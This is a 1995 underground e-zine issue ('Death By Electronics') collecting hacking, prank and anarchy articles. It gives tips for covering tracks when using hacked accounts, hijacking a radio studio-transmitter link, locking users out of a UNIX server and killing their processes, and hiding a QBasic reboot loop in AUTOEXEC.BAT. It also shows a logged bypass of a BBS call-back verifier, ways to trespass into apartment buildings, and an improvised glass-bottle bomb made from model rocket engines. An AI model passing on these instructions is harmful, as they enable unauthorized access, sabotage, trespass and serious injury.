<-><-><-><-><-><-><-><-><-><-><-><-> <-> Death By Electronics <-> <-> Volume 2, Issue 5 <-> <-> Released on <-> <-> 05/14/95 <-> <-><-><-><-><-><-><-><-><-><-><-><-> +----------+ |Disclaimer| : We, at DBE, take no responsability for your actions +----------+ due to this magazine. We are simply using the freedom of speech, and the freedom of the press. We do not encourage you to do anything that we demonstrate in this magazine. +------------------+ |Quick Introduction| : This magazine is late by 3 months. There are many +------------------+ reason for this. The 1st one was that I was negotiating a merge with another group. After 1 month, the merge never happened. Also, I didnt have anymore time to manage DBE, so I gave away my position to Vertical Dancer. The switch took up some valuable time. Hopefully, you will not see something like this occur again. We are sorry for the delay. We hope you enjoy our 5th mag. <-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-> <-> Table Of Contents <-> <-> <-> <-> 1. The Pentium Flaw -Source Unknown <-> <-> 2. Hacked Accounts -No Fear <-> <-> 3. Taking Over a Radio Station -No Fear <-> <-> 4. UNIX Fun -No Fear <-> <-> 5. Qbasic Virus Joke -Source Unknown <-> <-> 6. Mini Hacks & Bugs -Source Unknown <-> <-> 7. Guide to Renegade Security - Part I -Vertical Dance <-> <-> 8. Breaking Into Appartement Buildings -Source Unknown <-> <-> 9. Rocket Engine Bombs -Cadalyst <-> <-> <-> <-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-> (1). The Pentium Flaw by Source Unknown As you have known for quite a long time, all Pentium computers bought before March most likely have a flaw in the chip. Intel says that you will notice the flaw in the chip every 27,000 years. Thats fucking bullshit if you ask me. You will most likely notice it if you use a spreadsheet to calculate your finances. There are approx 1,400 such flaws in the Pentium Chip. Here is one of them: 4,195,835 / 3,145,727 * 3,145,727 = 4,195,579 --> off by -256 You MUST do this in a program that will use the CPU's chip's full power. Such a program is Windows Calculator. QBASIC or almost any compiler will not work since it will most likely compile it at a lower CPU instructions (such as 286 instructions in Turbo Pascal). So, to do this, you have to find yourself a program that will use the CPU's full power. And make sure that you press '=' after every operation! For example, for the 1st problem, you would enter exactly these keys in this order: 4195835 / 3145727 = * 3145727 = If you have a Pentium 60 and you get your chip fixed, you will most likely end up having a Pentium 66 chip since Intel discontinued their Pentium 60's. So in the end, you will have a computer that is 10% faster absolutely free! (2). Hacked Accounts by No Fear If you are one of the lucky one that have access to a hacked account, one this that you must be careful is how you use it. First things first, you do not want the illegal entry traced to you, so some precautions must be taken. The best way to use a hacked account it to use and anonymous telnet, or what not. Using an anon telnet the sysop will have a hard time trying to trace the login. One way to do it is the following. Enter the hacked account through the anonymous, then go to your real account (if you have one), then from there back to the hacked account. Using this method you can claim that your account was hacked, thus washing your hands clean except that you will now be bothered by the 'NetCops, so if you want to have a clean getaway, Dont use this method. Second, always leave things the way they were (visibly). The last thing you want it for the owner of the account to find out that his account is hacked and notify the sysop. Thus before leaving the account, tidy up the place. This is especially important with E-mails. Some mailing systems like PINE, keep a log of all the mail sent even if PINE is not used because the other mailing utility will have the same folders. So it is always wise to check those things out, because an E-mail is a dead give-away. But the best thing is to refrain from E-mailing out of a hacked account. Following these easy tips should keep you out of trouble, and you'll have years of joyous hacking. To quote House of Pain: "It ain't a crime if you don't get caught." (3). Taking Over a Radio Station by No Fear If you always wanted to play a practical joke and take control of your favorite radio station, this might be of some help. We all know that radio waves travel through space by means of a transmitter and a receiver. In the case of a radio station, the station is the transmitter and your radio is the reciever. Thus if you can broacast at the same frequency, you can then take control of the segment of wave-band where the radio operates. The problem with this is that unless your transmitter is very powerfull, you will only be able to affect the neighbouring region. But here is a better method to achieve the same goal. Some radio stations do not house their transmitters at their studio site, thus they have to feed the broadcast audio to the transmitter in some manner. Just about the only two methods are an "equalized broadcast loop" which is nothing more than a leased line provided between the two sites by the telecommunications company. The line is conditioned to provide a flat response up to about 15 Khz so as not to degrade the audio. But since this is a line, unless you know where it is and can tap it, it is difficult to do. The other method to deliver broadcast audio from the studio is via STL (Studio Transmitter Link). An STL is basically a point-to-point wideband FM transmission in the 945-955 Mhz range. STL links use high-gain directional antennas pointed at each other as to not scatter to signal and pickup inteference from other electronic devices. Now, a transmitter on the same frequency closer to the receiving directional antenna than the radio transmitting one could "capture" the main transmitter tower. Another way is to use a transmitter with a higher output near the directional receiving antenna at the main transmitter site. And voila, you got yourself a pirate radio on a licensed broadcast transmitter. Now this might work, or it might not, nevertheless, it is worth the try. This would definately be an amasing hack, and a great April Fool's Day joke. (4). UNIX Fun by No Fear You got access to a cool UNIX server, but there are too many people on the server hogging all the CPUs. Well, here is an easy way to get more power out of the UNIX. First look for the file /etc/nologin[s], if it does not exist, make one up and edit it to have it say whatever you want. You can write a long excuse that the system is currently being serviced or you can tell people to simply fuck-right-off. Writing nothing is also an option, but the file must exist. Now, as long as the file exists, /bin/login won't let people on the system, informing then them what you have written in /etc/nologin[s]. Now, no new user can log on the system. As users logoff, the number of users decrease, thus the CPU load will also decrease. If you wish to accelerate to process, you can start killing people's processes. They get logged off, they can't get back on. All that time, you're still online enjoying the full power of the UNIX server. But be warned, this will not always work; and as time goes on, this bug will most likely be fixed! (5). Qbasic Virus Joke by Source Unknown Here are the instructions to create a very lame virus simulator in Qbasic. It is very simple, and very primitive, but it works. You can modify it to your needs. Try it out, its harmless. CLS INPUT "C:\>", ha$ PRINT "Tough Luck Asshole!" SLEEP 1 LET per = 0 DO WHILE per <= 100 CLS PRINT "Formating"; per; "%" LET per = per + 3 SLEEP 1 LOOP CLS PRINT "Formating 100 %" PRINT "Format Complete!" 10 INPUT "C:\>", haa$ PRINT "Bad command or file name" GOTO 10 I remember doing this in a computer store while my dad was looking for a new computer. I entered the above lines, and I pressed F5 to run the program. I then left the computer but watched it in the distance. I saw this guy go up to it and enter a command in the C:\> prompt. I then looked at his face. He kinda smiled in surprise, and walked away. I then saw a store clerk walk by the computer and notice the "Format Completed!" line. He then typed an instruction, and it now displayed "Bad command or file name". He walked away with a look of nervosity in his face. He came back after approx 2 minutes with the store manager. They now entered another command, muttered a few words, and both walked away. I decided that my job was done, and walked away from the scene. Remember, that to exit the program, you must press CTRL-BREAK! (6). Mini Hacks & Bugs by Source Unknown The following is a list of miny hacks and bugs that I found (most of them by mistake) in different softwares. Try them out. They may or may not work depending on your computer configuration. 1. In Telix v3.22, write "SLAP" when you are in the Telix "prompt" (the screen from which you can do all the commands. If you do this, for some strange reason, all the characters will begin to get screwed up. To clear it, you will have to send in your modem init string. Im not sure if this will work for you, since everybody will have a different configuration, but try it anyways. 2. Edit AUTOEXEC.BAT. In the PATH command, where it will probably say "C:\DOS;C:\WINDOWS;", remove the "C:\" from the "C:\WINDOWS" line. (you could always remove the entire "C:\WINDOWS" string, but if you do it this way, it will be harder for someone to detect it. Now, when you load up windows, all you will have is the program manager box, but there will be no icons or anything in it. If you try to exit, it will say "Memory is Low. Close an application". And you wont be able to exit. If you try to exit a second time, it wont display this message, and you will be able to exit normally. 3. If you want to make it so a computer keeps on rebooting over and over, you will need to do this: First, you must have a copy of QBasic (which comes standard with DOS.) Now, enter the following lines in QBasic, and save it under any name you want, as long as it ends with .BAS. DECLARE SUB ReBoot (Warm%) CALL ReBoot(1) SUB ReBoot (Warm%) STATIC IF Warm% THEN DEF SEG = 0 POKE &H473, &H12 POKE &H472, &H34 END IF DEF SEG = &HFFFF CALL Absolute(0) END SUB (Use Cut & Paste) You will now have to create a batch file that will load up QBasic and then run the program since the QBasic that comes with DOS does not have the ability to compile QBasic to an executable format. QBASIC /RUN [Drive][Directory][Filename] (ex: QBASIC /RUN C:\DOS\REBOOT.BAS) Now, edit the AUTOEXEC.BAT so that it runs this file as soon as it boots up. (You could always skip part 2, and enter the "RUN /QBASIC" line in the AUTOEXEC, but this way, it will be harder to detect. Just make sure that it the AUTOEXEC runs it AFTER the "PATH" line (or else it wont be able to run QBASIC which is in the DOS directory) 4. Do you hate call back verifiers? Well, this will work with certain call back verifiers. The one that it worked on, was: CALLME -- Maximus Automatic Verifier by Dan Thomson, October 1992 -Go into the call back verifier program, when it asks you for the phone number to reach you at, enter one that is already in use (and already validated) A good one would be the BBS's number (the one you are on). -It will ask you if you wish to go on, enter yes -It will now say "Hanging up. Please standby...", but after about 2 seconds, it will give you a message saying that the number is already in use. -If it worked proprely, you will return to the BBS with full user access! I only tried this on 3 boards, and it worked one one. Try calling Senators BBS (613 445-2101) and trying it there. Thats the board where it worked. Here is actual "footage" of me in action on Senators BBS. Watch and learn: --------==[EVENT 1]==-------- Main: * Get Access!!! Scan for mail... Yell for Sysop Goodbye (log-off) Select: * --------==[EVENT 2]==-------- Use the Questionairre then use the call-back!: + Call-Back Main Menu Select: + --------==[EVENT 3]==-------- CALLME -- Maximus Automatic Verifier by Dan Thomson, October 1992 I am about to hang up and call your computer back. Before I go, I want to make sure I have the right information. Please check the following number: Phone: (613)555-5555 Is this your COMPUTER's phone number [Y,n,q]? n --------==[EVENT 4]==-------- Make sure you enter the phone number that your COMPUTER is connected to! Please enter your phone number [(xxx) yyy-zzzz]: (613)445-2101 --------==[EVENT 5]==-------- CALLME Maximus Automatic Verifier will now hang up and dial you back at the number you provided. If you have a Hayes compatible modem, RING will appear on your screen. Type ATA and press your or key. If you have some other kind of modem please check your user manual and set it up to answer the phone when it rings. Once a connection has been made, CALLME will ask you for the password you entered when you first logged in. If they match, your access will be upgraded. Should I continue [Y,n]? y --------==[EVENT 6]==-------- Hanging up. Please standby... Sorry, that phone number is present in the current BAD USER list. Contact the Sysop for further information... --------==[EVENT 7]==-------- Thank you for using CALLME. Enjoy the BBS! You are now a registered user. Your time limit has been adjusted to 29 minutes for this call. Press ENTER to end intermission --------==[EVENT 8]==-------- Use the Questionairre then use the call-back!: + Call-Back Main Menu Select: m --------==[EVENT 9]==-------- The best way to keep your friends is not to give them away. Main: * Get Access!!! Scan for mail... + RUMOURS!! Message Areas File Areas Edit Setup Look Statistics Door Games! Other stats UzerList -Stuff in the Puck Yell for Sysop Bulletins : Offline Reader Who is On /Chat Menu ?help Goodbye (log-off) Select: ---END OF FOOTAGE--- Hehe. Kinda haleriouis eh? Try it out. It should work (unless the sysop has read this and has changed his call back verifier program) 5. Load up Windows, and go in the calculator program (the one that comes standard with Windows). Now, do the operation 3.11 - 3.1 What is the answer? No, it isent 0.01 as it should be, but its 0.00 Yes, thats right. 0.00. And no, you dont need a Pentium to perform this flaw. (7). Guide to Renegade Security - Part I by Vertical Dancer Many sysops set up very nice systems, they spend great amounts of time making their boards cosmetically pleasing, but often neglect to keep tight security. They risk loosing all their hard work. By using many of the topics discussed below a sysop can greatly increase the chance of having a long standing and well run BBS. Most sysops, unless running a private BBS, let just about anybody onto the system. For them, using a call back verifier would greatly increase security by forcing users to be called back for verification. On a more private system (if not using a call back verifier) you must take the time to have good security and know your users. GENERAL SECURITY: Users on your bbs, should have to make a password change at least once a month; make sure passwords are at LEAST six characters long. Encouragin alphanumberic or cryptic passwords will further tighten security. Sysops should have very cryptic account and system passwords, they should be changed frequently. For another point of security, sysop can toggle the phone number checking. This will force the user to enter the last four digits in her phone number after entering her password. Many sysops like to have Co-sysops, but they often don't get to know the person, and just give them s250 or s255 access. Now, this person can easily crash/mess up your system, unless you have taken proper security measures. Even then someone with s250 access could easily change many things. There are a variety of programs available that will scan newly uploaded files for virii and trojans. These are good if you are woried about people trying to crash your system. Of course, a sysop should scan her system with a good quality virus scanner often. If you have the time and means of doing it, backing up your entire hard drive is a very good idea. Sysops should run their bbs from a batch file which will drop carrier and reload the bbs on an inproper error level, but will exit to dos as normal for the sysop pressing Q. TECHNICAL SECURITY: 1) No RG sysop should leave the archive menu available to users. It serves no useful purpose normally. Sysops should delete the menu, make it's acdess level s255, or delete the menu command to get to it. 2) Make sure on every menu, important command all have their own security level. So that way if someone jumps to an off limits menu, they hopefully will not be able to perform any commands. 3) There are many ways to lock up a BBS, so you should make sure your BBS is impeccably set up. This will minimize the risks of someone locking your system up. Likewise, you should occasionally check your BBS to make sure it is running smooth. If you are not going to be checking the BBS for long periods of time, you should at least make an event to reboot your computer once a day. 4) If a user gets high enough access, she can "Jump commands". Sysops should watch out for this from high access users including the Co. To protect yourself make a menu called GLOBAL. In this menu include these commands: // and //\\ make sure they just clear the screen, and/or drop carrier on the user. (8). Breaking Into Appartement Buildings by Source Unknown Ok, so you wanna get into an appartment building and get drunk on the 18th floor since none of your friends will let you drink at their house? Well, if this resembles your average Saturday night, then read on. In the past month, me and my friends have tried many different tricks to get into appartment buildings, try all of these on your target of choice, but remember: The fancier the building, the more security it will have. 1. Side doors and back doors are rarely locked. This was true for 2 out of 4 buildings that we broke in. For some reason, they keep the front door well secured, but fail to secure the side and back doors. 2. Wait near the parking lot entrence (if it has a garage door) for a car to pass by. Once the car goes in the zone where the garage door opens, wait until the door begins to close before entering (so that you lower your chances of the driver seing you). Once in the indoor parking lot, you can go anywhere in the building. (True for most buildings) 3. Enter the front of the building and press every button until some drunken moron opens the door for you. Sometimes this dosent fully work, so you have to improvise. Try talking to some guy on the HIGHEST floor so that he cant come down and see you; and say something like: "You have won a free pizza courtesy of Pizza Pizza!" "Shmom? Shhmom? Im drumk. Ophen tha doo...." "This is the police, let us in!" You will be suprised on how stupid people can be. (We once simply said "Let us in." and the guy opened the door for us) Just make sure you do it on somebody living at the lowest on the 5th floor. 4. This one resembles very much that of #2. Simply wait near the door for somebody to get in, and when they arent looking (and while the door is still opened) rush inside. Or you can simply ask them to open the door for you. A few days ago, a cop came into the building and asked me where I came from and where I was going (I was leaving a party on the 18th floor, and I was going to another party next door) I had a beer in my hand (which I hid in back of me) but the cop didnt bust me. He simply said "Havent I arrested you before?" Hehe... so if you want to play it safe, make sure that you take down the name and number of somebody's room in the appartment, and when a cop asks you where you came from, tell him the number; but make sure that its located pretty high up in the building, cause if its right on the 1st floor, the cop might ask you to show him where you came from. (cops are too lazy to take an elevator to the 18th floor) (9). Rocket Engine Bombs by Cadalyst Don't you wish that their was an awesome bomb that you could construct at your very own home? Don't you wish that you could make a bomb with easy ingredients and non-life threatening results? A bomb which doesn't take a chemistry scientist to put together. Well, I have just the home-made recipe for all you anarchy kids out there. This bomb is one of my own discovery and invention. I have yet to hear anyone with the same blueprints...now, on with the fun. What you need first. Well, it's time to take a friendly stroll to our local Toys'R'Us. Go to the neato rocket section with the plastic models. You know that one. Well, look at those little rocket engines for those cardboard rockets that fly in the air. They're in packs of 3 small tubes and each have a label of B3,or C4.etc. Look for the biggest tubes, probably C-5's. They're pretty expensive, 7$ for the pack. but that's all you need! (or just get a friend to steal them, whichever.) Now take your new purchase home and unravel the tubes. After a couple of minutes of unravelling, inside there will be a hard rockish substance with a crumbly grey top. Just pop off the grey top (it's crap) and put the hard rockish thing on a piece of paper. Smash the black rockish thing into little chunks about 1 cm. blocks. Use a hammer or anything, just make sure you don't lose the rockish stuff. Now put the rockish stuff in a glass bottle, the fruit punch bottles you get from the machines. Anything that's glass and small. Now two unravelled tubes make a big explosion, three is a *big* ***loud*** explosion. Back to the plans. Okay, put the lid on the glass bottle (the one with the rockish stuff in it) and put a hole in the lid. Make the hole about 1 cm. by 1 cm. Now take a good old sparkler and put it in the hole. Most of the sparkler is in the bottle, 5 cm. of the other end of the sparkler is sticking out. Now, take the friendly super bomb to your local park. Place it on that rusty old bench that's been in your park for 5 years. Take a lighter, light the top sparkler and run. Run far. Really far. I have made 5 of these and have yet to blow myself up. it's pretty safe. (you hope :) The actually power of the explosion isn't that bad, but the noise and light and thunder will shake your neighbourhood. That's it. very simple. A recap. A glass bottle with this blackish rockish rocket fuel in it. A sparkler in it. Simple, I guarantee it will work. If it sounds to good to be true or complicated, you wrong. This is the simplest thing to do. Show your family show your friends. +--------------------------------------------------------------------------+ | <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> | | <*> DBE will be undergoing changes in the near future, so now's the <*> | | <*> time to tell us what you would like to see done with the group. <*> | | <*> Remember, that we need to hear from YOU to do this successfully. <*> | | <*> If you have suggestions or comments about the mag, you can reach <*> | | <*> us at: an254770@anon.penet.fi <*> | | <*> <*> | | <*> "Its Quality, not Quantity that counts" <*> | | <*> -Unknown <*> | | <*> <*> | | <*> --[Members in DBE up to Date]-- <*> | | <*> <*> | | <*> Vertical Dancer <*> | | <*> Source Unknown <*> | | <*> No Fear <*> | | <*> NightWidow <*> | | <*> Vector Sigma <*> | | <*> Cadalyst <*> | | <*> <*> | | <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> | +-----------+++--------------------------------------------+++-------------+ [|||] [|||] +------+++--------------------------------------------+++------+ | Involution Ocean (6i3) XXX-XXXX DBE WHQ | | Superior Authority (6i3) XXX-XXXX DBE MEMBER | +--------------------------------------------------------------+